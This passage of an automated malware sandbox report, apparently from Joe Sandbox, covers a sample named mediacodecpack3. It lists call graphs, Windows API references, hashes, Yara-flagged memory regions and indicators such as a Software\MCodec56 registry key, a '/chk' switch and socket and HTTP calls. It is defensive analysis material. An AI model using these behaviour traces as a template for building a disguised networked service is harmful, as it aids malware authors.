                                                                                            • Opcode Fuzzy Hash: 1bc7f3047247dcb619e6d1535c0c4bc915be8c24a6252e4ac1298b469f7ef16d
                                                                                            • Instruction Fuzzy Hash: 4231BCB1908705AFD711DF25D884B66BBE8FB48765F404A6EF81593A80D7B5E800CFA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 902 2b91ba7-2b91bcf call 2bb2a10 RtlEnterCriticalSection 905 2b91be9-2b91bf7 RtlLeaveCriticalSection call 2b9d334 902->905 906 2b91bd1 902->906 909 2b91bfa-2b91c20 RtlEnterCriticalSection 905->909 907 2b91bd4-2b91be0 call 2b91b79 906->907 914 2b91be2-2b91be7 907->914 915 2b91c55-2b91c6e RtlLeaveCriticalSection 907->915 910 2b91c34-2b91c36 909->910 912 2b91c38-2b91c43 910->912 913 2b91c22-2b91c2f call 2b91b79 910->913 917 2b91c45-2b91c4b 912->917 913->917 920 2b91c31 913->920 914->905 914->907 917->915 919 2b91c4d-2b91c51 917->919 919->915 920->910
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B91BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02B91BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02B91BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02B91C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02B91C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0
                                                                                            • Opcode ID: 3b9a586a0c135a4520c2762469b1fe9d251f51f2d1e1add0be0e48b9e303a3f8
                                                                                            • Instruction ID: a177d8d897b0e362193c7236fd781b699c5c242afacd02a869a82a6ff1cca7b1
                                                                                            • Opcode Fuzzy Hash: 3b9a586a0c135a4520c2762469b1fe9d251f51f2d1e1add0be0e48b9e303a3f8
                                                                                            • Instruction Fuzzy Hash: 61218875A04205ABDB15CF68C4447AABBB9FF48324F108599E81DAB301D7B1E905DBE0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 930 2b9615e-2b96161 931 2b96163-2b96174 930->931 932 2b960f5-2b960f9 930->932 931->930 933 2b96104 Sleep 932->933 935 2b9610a-2b96448 RtlEnterCriticalSection RtlLeaveCriticalSection 933->935 937 2b9644a-2b96450 935->937 938 2b96464-2b9646e 935->938 939 2b96452-2b96454 937->939 940 2b96456-2b96463 call 2b9534d 937->940 941 2b960f0-2b960f2 938->941 942 2b96474-2b96498 call 2ba3760 call 2b9439c 938->942 939->938 940->938 943 2b960fb-2b960fd 941->943 944 2b960f4-2b960f9 941->944 942->941 952 2b9649e-2b964c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba134c 942->952 943->935 948 2b960ff 943->948 944->933 948->933 955 2b964cb-2b964da call 2ba134c 952->955 956 2b96513-2b9652b call 2ba134c 952->956 955->956 963 2b964dc-2b964eb call 2ba134c 955->963 961 2b96531-2b96533 956->961 962 2b967d2-2b967e1 call 2ba134c 956->962 961->962 965 2b96539-2b965e4 call 2ba1fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba3760 * 5 call 2b9439c * 2 961->965 970 2b967e3-2b967e5 962->970 971 2b96826-2b96835 call 2ba134c 962->971 963->956 973 2b964ed-2b964fc call 2ba134c 963->973 1015 2b96621 965->1015 1016 2b965e6-2b965e8 965->1016 970->971 974 2b967e7-2b96821 call 2ba3760 RtlEnterCriticalSection RtlLeaveCriticalSection 970->974 984 2b9684a-2b96859 call 2ba134c 971->984 985 2b96837-2b96845 call 2b95c11 call 2b95d1f 971->985 973->956 986 2b964fe-2b9650d call 2ba134c 973->986 974->941 984->941 995 2b9685f-2b96861 984->995 985->941 986->941 986->956 995->941 999 2b96867-2b96880 call 2b9439c 995->999 999->941 1006 2b96886-2b96955 call 2ba1428 call 2b91ba7 999->1006 1017 2b9695c-2b9697d RtlEnterCriticalSection 1006->1017 1018 2b96957 call 2b9143f 1006->1018 1022 2b96625-2b96653 call 2ba1fbc call 2ba3760 call 2b9439c 1015->1022 1016->1015 1021 2b965ea-2b965fc call 2ba134c 1016->1021 1019 2b96989-2b969f0 RtlLeaveCriticalSection call 2b93c67 call 2b93d7e call 2b9733f 1017->1019 1020 2b9697f-2b96986 1017->1020 1018->1017 1043 2b96b58-2b96b6c call 2b98007 1019->1043 1044 2b969f6-2b96a38 call 2b99729 1019->1044 1020->1019 1021->1015 1032 2b965fe-2b9661f call 2b9439c 1021->1032 1041 2b96655-2b96664 call 2ba25f6 1022->1041 1042 2b96694-2b9669d call 2ba1f84 1022->1042 1032->1022 1041->1042 1055 2b96666 1041->1055 1053 2b967c0-2b967cd 1042->1053 1054 2b966a3-2b966bb call 2ba27c5 1042->1054 1043->941 1056 2b96a3e-2b96a45 1044->1056 1057 2b96b22-2b96b53 call 2b973ee call 2b933b2 1044->1057 1053->941 1066 2b966bd-2b966c5 call 2b9873b 1054->1066 1067 2b966c7 1054->1067 1059 2b9666b-2b9667d call 2ba1860 1055->1059 1061 2b96a48-2b96a4d 1056->1061 1057->1043 1073 2b9667f 1059->1073 1074 2b96682-2b96692 call 2ba25f6 1059->1074 1061->1061 1065 2b96a4f-2b96a94 call 2b99729 1061->1065 1065->1057 1076 2b96a9a-2b96aa0 1065->1076 1072 2b966c9-2b9676d call 2b99853 call 2b93863 call 2b95119 call 2b93863 call 2b99af9 call 2b99c13 1066->1072 1067->1072 1099 2b9676f call 2b9380b 1072->1099 1100 2b96774-2b9679f Sleep call 2ba0900 1072->1100 1073->1074 1074->1042 1074->1059 1080 2b96aa3-2b96aa8 1076->1080 1080->1080 1083 2b96aaa-2b96ae5 call 2b99729 1080->1083 1083->1057 1089 2b96ae7-2b96b21 call 2b9c11b 1083->1089 1089->1057 1099->1100 1104 2b967ab-2b967b9 1100->1104 1105 2b967a1-2b967aa call 2b94100 1100->1105 1104->1053 1107 2b967bb call 2b9380b 1104->1107 1105->1104 1107->1053
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                            Strings
                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02B96129
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveSleep
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                            • API String ID: 1566154052-1923541051
                                                                                            • Opcode ID: 948de24367023195f1b302703f89288894d563acacd716c7c007af42a1eb21e7
                                                                                            • Instruction ID: f6add51123e67a1f86f4c81a8af9295c94c790258d7dbd5c75a0834521fb83b0
                                                                                            • Opcode Fuzzy Hash: 948de24367023195f1b302703f89288894d563acacd716c7c007af42a1eb21e7
                                                                                            • Instruction Fuzzy Hash: 46F0CD3298C3C08FDB138B60A8A8AA53F74AF5B314B4A05DAF4869B063C1D51845C7B3

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 00402A46
                                                                                              • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                            • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                              • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2057626494-0
                                                                                            • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                            • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1138 2b92edd-2b92f1f WSASetLastError WSASocketA call 2b9fb20 WSAGetLastError 1141 2b92f49-2b92f4f 1138->1141 1142 2b92f21-2b92f25 1138->1142 1143 2b92f3c-2b92f47 call 2b9fb20 1142->1143 1144 2b92f27-2b92f36 setsockopt 1142->1144 1143->1141 1144->1143
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02B92EFD
                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02B92F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02B92F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            • Opcode ID: e8f26e4a7143b29702206be0d782cb302aad70d932d4a4a3229fbfc9b9218005
                                                                                            • Instruction ID: e88da107fd984a6597f15e55425e30fa437dcf61fe0aa4bb7e6abf61f5eb0cb7
                                                                                            • Opcode Fuzzy Hash: e8f26e4a7143b29702206be0d782cb302aad70d932d4a4a3229fbfc9b9218005
                                                                                            • Instruction Fuzzy Hash: C1018871900304BBDF215F65DC88B9B7BADDB857B1F008565F918CB181D7B088008BA1
                                                                                            APIs
                                                                                              • Part of subcall function 02B92D39: WSASetLastError.WS2_32(00000000), ref: 02B92D47
                                                                                              • Part of subcall function 02B92D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02B92D5C
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02B92E83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            • Opcode ID: c86ef393773f79d1979ef54a490986b267f15d4fdeac5879dc2a309e773fbd25
                                                                                            • Instruction ID: 8e56458cd38e803eda881a5de859c75aaae1928e0dc8bc865060cac72f4376a1
                                                                                            • Opcode Fuzzy Hash: c86ef393773f79d1979ef54a490986b267f15d4fdeac5879dc2a309e773fbd25
                                                                                            • Instruction Fuzzy Hash: DD317CB1E10205ABDF109F68D8547EEBBAAEF05364F0045FADC08D7240E77595558FA0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92AEA
                                                                                            • connect.WS2_32(?,?,?), ref: 02B92AF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            • Opcode ID: c78ef114fa5e805979ec77fe6d584430e2bea5fc2b456ff55399331a77e00742
                                                                                            • Instruction ID: 78d7b4feea0e5896fd60dc809c28842a1bada9ad22663b9b9474489f284965e4
                                                                                            • Opcode Fuzzy Hash: c78ef114fa5e805979ec77fe6d584430e2bea5fc2b456ff55399331a77e00742
                                                                                            • Instruction Fuzzy Hash: 17219275E00204ABDF10AFB8D4146AEBBFAEF44364F0081E9DD1897280DB744A018B91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 9cae0934772d073e561a79dc7f1e82f9395975d90d7b1cb8e1af30e72c1b2d4e
                                                                                            • Instruction ID: 04b62df590bbd575fe8e150b1f4f4f5e973c33f2bde6b62f7b58d116a568f82f
                                                                                            • Opcode Fuzzy Hash: 9cae0934772d073e561a79dc7f1e82f9395975d90d7b1cb8e1af30e72c1b2d4e
                                                                                            • Instruction Fuzzy Hash: 70514CB1904206DFCF19DF68D5516AABBF1FF08320F1481AEE8299B391D7749911CFA1
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02B936A7
                                                                                              • Part of subcall function 02B92420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02B92432
                                                                                              • Part of subcall function 02B92420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02B92445
                                                                                              • Part of subcall function 02B92420: RtlEnterCriticalSection.NTDLL(?), ref: 02B92454
                                                                                              • Part of subcall function 02B92420: InterlockedExchange.KERNEL32(?,00000001), ref: 02B92469
                                                                                              • Part of subcall function 02B92420: RtlLeaveCriticalSection.NTDLL(?), ref: 02B92470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
                                                                                            • Opcode ID: 2b10a1f7c2b1f0600840dc9aead60e26cacef0549d1b594724e00e56d505a95f
                                                                                            • Instruction ID: bbc913419e3dd1851f39e04f831ae599eebbe565f5987153de7b2dac81a8c9b2
                                                                                            • Opcode Fuzzy Hash: 2b10a1f7c2b1f0600840dc9aead60e26cacef0549d1b594724e00e56d505a95f
                                                                                            • Instruction Fuzzy Hash: AA1106B5604208ABDF219F14DC85FAA3BEAEF05354F1044A6FE12CB2D0C779D860CB94
                                                                                            APIs
                                                                                            • __beginthreadex.LIBCMT ref: 02BA1116
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02B9998D,00000000), ref: 02BA1147
                                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02B9998D,00000000), ref: 02BA1155
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 1685284544-0
                                                                                            • Opcode ID: 0284460f675dff0ef54532d208632e6c86a1a33dd6d7b1d5406f7e4069630070
                                                                                            • Instruction ID: 03f8c88e761cb2e5785acaf30936ee35c4fcc38a5cc816f9b30752f1b3e027ce
                                                                                            • Opcode Fuzzy Hash: 0284460f675dff0ef54532d208632e6c86a1a33dd6d7b1d5406f7e4069630070
                                                                                            • Instruction Fuzzy Hash: 7BF06271250200ABEB209E6CDC90F9573E9EF49725F2409AAF658D7290D7A1A8D29B90
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(02BC529C), ref: 02B91ABA
                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02B91ACB
                                                                                            • InterlockedExchange.KERNEL32(02BC52A0,00000000), ref: 02B91AD7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1856147945-0
                                                                                            • Opcode ID: b5a69f8a6b2001dfc0fa324be79471db127d49a259f8baf2e67dc98289963a0f
                                                                                            • Instruction ID: 5ab5b9c4ee05f3b3284a7fb4a2d928a9f24952745344dac0eac40a33bb7fd5af
                                                                                            • Opcode Fuzzy Hash: b5a69f8a6b2001dfc0fa324be79471db127d49a259f8baf2e67dc98289963a0f
                                                                                            • Instruction Fuzzy Hash: DDD05E31D846085BE23176A4AD0EB7877ACD705712FD00695FDB9DA1C0EAD2692087A7
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: InternetOpen
                                                                                            • String ID: U[6
                                                                                            • API String ID: 2038078732-2089642770
                                                                                            • Opcode ID: 358883196de9751098e698ad59654cbae274b78773688df4f4d97c785f25f8e4
                                                                                            • Instruction ID: e8d88152404cc63a7b4ba454b790abc830ad23c88b96bb19ba72e26d7fa821b5
                                                                                            • Opcode Fuzzy Hash: 358883196de9751098e698ad59654cbae274b78773688df4f4d97c785f25f8e4
                                                                                            • Instruction Fuzzy Hash: 54515CB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558548A97
                                                                                            APIs
                                                                                            • GetStartupInfoA.KERNEL32(0040BC70), ref: 0040D55C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoStartup
                                                                                            • String ID: 3h
                                                                                            • API String ID: 2571198056-227859408
                                                                                            • Opcode ID: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction ID: 03e41e0e2fbe8f3f1350c05a2512de981e85b09ededd3a12d9f5b7d8ff28fd69
                                                                                            • Opcode Fuzzy Hash: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction Fuzzy Hash: 604117B1908246CBD7149B68DE313E677B0E702321F14423E9553B31E2D77C444AEB5E
                                                                                            APIs
                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\MCodec56,00000000), ref: 0040DC43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID: Software\MCodec56
                                                                                            • API String ID: 2289755597-4241566752
                                                                                            • Opcode ID: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction ID: 93077888e0bbcd1fcb5d665c645348ae1621a215fb68b31d801dbfa4ad4509b8
                                                                                            • Opcode Fuzzy Hash: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction Fuzzy Hash: 2CD0A931A9C20AB8F2002A924D0EB721514B708B94F60083B2452B30C6C2B8844BD25B
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: MediaCodecPack
                                                                                            • API String ID: 3535843008-199385074
                                                                                            • Opcode ID: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction ID: f19db8fe7a91f9339945a850f06442911a31ce16223db01261e704d0ab5d2cd6
                                                                                            • Opcode Fuzzy Hash: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction Fuzzy Hash: B4B01221A4C510D7E5282BD05B09D6E34015544720732003B7683391E34FFD040B73EF
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B94BF2
                                                                                              • Part of subcall function 02B91BA7: __EH_prolog.LIBCMT ref: 02B91BAC
                                                                                              • Part of subcall function 02B91BA7: RtlEnterCriticalSection.NTDLL ref: 02B91BBC
                                                                                              • Part of subcall function 02B91BA7: RtlLeaveCriticalSection.NTDLL ref: 02B91BEA
                                                                                              • Part of subcall function 02B91BA7: RtlEnterCriticalSection.NTDLL ref: 02B91C13
                                                                                              • Part of subcall function 02B91BA7: RtlLeaveCriticalSection.NTDLL ref: 02B91C56
                                                                                              • Part of subcall function 02B9D0FC: __EH_prolog.LIBCMT ref: 02B9D101
                                                                                              • Part of subcall function 02B9D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02B9D180
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02B94CF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1927618982-0
                                                                                            • Opcode ID: ebaae471146b093d87b6ccc274cd2077875160fc17dd5cbae2f2dbdd923c8c7a
                                                                                            • Instruction ID: 825c03fb4e8a94dcdf36d8c2ebd37ffde7687b84e005b01f64282b96c32f4e12
                                                                                            • Opcode Fuzzy Hash: ebaae471146b093d87b6ccc274cd2077875160fc17dd5cbae2f2dbdd923c8c7a
                                                                                            • Instruction Fuzzy Hash: 635115B5D042489FDF15DFA8C484AEEBBF5EF08314F1481AAE905AB252DB709A45CF50
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92D47
                                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02B92D5C
                                                                                              • Part of subcall function 02B9950D: WSAGetLastError.WS2_32(00000000,?,?,02B92A51), ref: 02B9951B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Send
                                                                                            • String ID:
                                                                                            • API String ID: 1282938840-0
                                                                                            • Opcode ID: 1d09ae63b8a12813a06105ea1a5f8d90db08efd17e1a88ad3da769d2599e38fc
                                                                                            • Instruction ID: c3cb1d6203e49b5d2343f4ab950229d00aeda0f5d43c919669a3e7d4ccfab69d
                                                                                            • Opcode Fuzzy Hash: 1d09ae63b8a12813a06105ea1a5f8d90db08efd17e1a88ad3da769d2599e38fc
                                                                                            • Instruction Fuzzy Hash: 9B0184B5900205BFDB205F98D84496BBBEDEF453A472005BEE85983240DB709D40CBA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 3132538880-0
                                                                                            • Opcode ID: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction ID: 4c22f98cd7c9e98f077693477baae5e06b4a06b3414cbbd33dac7c18dcee98c1
                                                                                            • Opcode Fuzzy Hash: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction Fuzzy Hash: 34018C7541A5918FC709CB24AFB06A93FB5D64A740705107DD1D6AB273D6384C05EB1D
                                                                                            APIs
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 369133424-3837807730
                                                                                            • Opcode ID: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction ID: 9673a0ded5c8b983d3e052be02671165733424ab24c3791a3204680fb7a92e49
                                                                                            • Opcode Fuzzy Hash: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction Fuzzy Hash: 1DF02434A08356DFDB058BA089146967BB4FB02310B0580FFC486EA197C7388806DF49
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B9740B
                                                                                            • shutdown.WS2_32(?,00000002), ref: 02B97414
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1920494066-0
                                                                                            • Opcode ID: 8aea91fdcab2d5a9fbaa6a23ad099fbd57261815606166a1579a144a0fee015d
                                                                                            • Instruction ID: 8e4c91e07c815d14f39e10e0e92bb7f93146b872bc35a2dff3c31929e759a1dd
                                                                                            • Opcode Fuzzy Hash: 8aea91fdcab2d5a9fbaa6a23ad099fbd57261815606166a1579a144a0fee015d
